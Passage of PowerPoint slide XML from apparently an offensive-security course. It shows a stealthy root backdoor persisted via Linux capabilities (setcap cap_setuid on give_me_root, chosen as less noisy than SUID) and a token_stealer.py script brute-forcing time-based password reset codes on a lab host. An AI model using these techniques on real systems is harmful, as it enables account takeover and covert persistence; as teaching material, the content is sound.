                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> +s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>give_me_root</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent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5EEB0E21-7C7D-4728-A0F1-89AD6CF3EE89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="889227" y="5068234"/>
            <a:ext cx="9602309"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 will list the file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34147B31-0755-4C29-9E77-E5D458E637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112" y="5578422"/>
            <a:ext cx="10153650" cy="1028700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="231268004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189</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889228" y="1883440"/>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We will try to run the file as “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khalid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1"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Linux-based systems (cont.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61691035-C7C7-43F9-B6EF-1B75F297A450}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1766868" y="2400454"/>
            <a:ext cx="9821776"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nl-NL" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root@server1:/test# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>su khalid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>khalid@server1:/test$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uid=1000(khalid) gid=1000(khalid) groups=1000(khalid)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>khalid@server1:/test$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>./dist/give_me_root </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root@server1:/test# </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>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5495D1D0-8A23-4C90-810B-5AC9B4E14E81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="889227" y="3780418"/>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Nice! the user “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khalid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” has successfully gotten a root shell.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="271935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Writing basic web exploits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Our script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>token_stealer.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> will calculate the needed values to construct the token</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80B36DEA-0EF3-4247-8DC8-4A58FA4FFFF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1849956" y="2209289"/>
            <a:ext cx="1013750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password_reset_time</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datetime.now</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>().timestamp()).split(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possible_password_reset_times</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = [</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password_reset_time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)-DIFF,</a:t>
            </a:r>
          </a:p>
          <a:p>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password_reset_time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) + DIFF)]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>possible_password_reset_codes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = [hashlib.sha1(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>code.encode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hexdigest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code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possible_password_reset_times</a:t>
            </a:r>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possible_code</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possible_password_reset_codes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"http://172.16.238.100/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>reset?code</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possible_code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"New Password"</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res.text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found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Found password reset code:"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possible_code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660446AB-372D-4738-A5DD-C621ACC87B89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1120050" y="5408711"/>
            <a:ext cx="1095453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this:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC5A481A-CB3F-4427-82A8-1D865A6A4FB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1849956" y="5899701"/>
            <a:ext cx="10137507"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 token_stealer.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>khalid@omani.cloud</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The password has been reset!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[+] Found password reset code: f535c5cb79fda9a518fee98d015492c25dd03db6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8132658-FDF8-4502-B667-3FBAA53A7546}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12343545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190</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889228" y="1883440"/>
            <a:ext cx="10413543" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The idea of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Linux capabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is just to divide traditional permissions of superuser (root) into specific units that are named capabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Instead of giving the SUID permission to the executable (which might be noisier), we will give it a capability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First, we will remove the SUID permission from our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>give_root_shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> binary:</a:t>
            </a:r>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Linux-based systems : The Linux capabilities way</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="A screenshot of a computer&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC5A0EC9-E403-4DB2-84C4-F54FCD481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5031" y="3429000"/>
            <a:ext cx="10039350" cy="2095500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6300867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191</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9584309B-9F2F-46C4-A68A-9E5C8FE2C9CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="889228" y="1883440"/>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Next, we will set the capability with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>setcap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1"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382742"/>
            <a:ext cx="10370118" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>On Linux-based systems : The Linux capabilities way (cont.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D98D9BBD-4B2C-4D53-A156-C5C61FADDB7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1766868" y="2400454"/>
            <a:ext cx="9821776"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nl-NL" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root@server1:/test# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>setcap cap_setgid,cap_setuid+ep dist/give_me_root</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45953703-31F2-4DBF-B3E7-F847D5D2929E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1830806" y="2821428"/>
            <a:ext cx="9556133" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>cap_setgid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: give us the capability to set an arbitrary GID.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>cap_setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: give us the capability to set an arbitrary UID.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>+ep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: to add the capabilities(effective, permitted).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3FD637A-D5F7-4D53-8614-5FC7A6B28B46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="889228" y="3788877"/>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We can check the capabilities that we’ve set with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>getcap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADF6F6DC-6A49-4F18-A8D1-2C9AB1ACCF48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1766868" y="4441812"/>
            <a:ext cx="982177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root@server1:/test# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>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dist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>give_me_root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dist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give_me_root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cap_setgid,cap_setuid+ep</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15465489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408945" y="225423"/>
            <a:ext cx="5502445" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t>Maintaining Access (cont.)</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192</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38514" y="1049868"/>
            <a:ext cx="10370118" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>On Linux-based systems : The Linux capabilities way (cont.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{062DB021-8B69-459F-ADE3-0BC0AB5136C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="780944" y="1561772"/>
            <a:ext cx="10413543"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list the file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{983F3B03-841A-431B-90A5-53310F590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9013" y="2029326"/>
            <a:ext cx="9963150" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{884B5AD0-AD9F-40B8-8D99-D1A6794D69D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="780944" y="3194348"/>
            <a:ext cx="10413543" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Notice that the file isn’t highlighted with a RED color (as it was the case in the previous method).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Next, we will run this as the user “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khalid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”:</a:t>
            </a:r>
          </a:p>
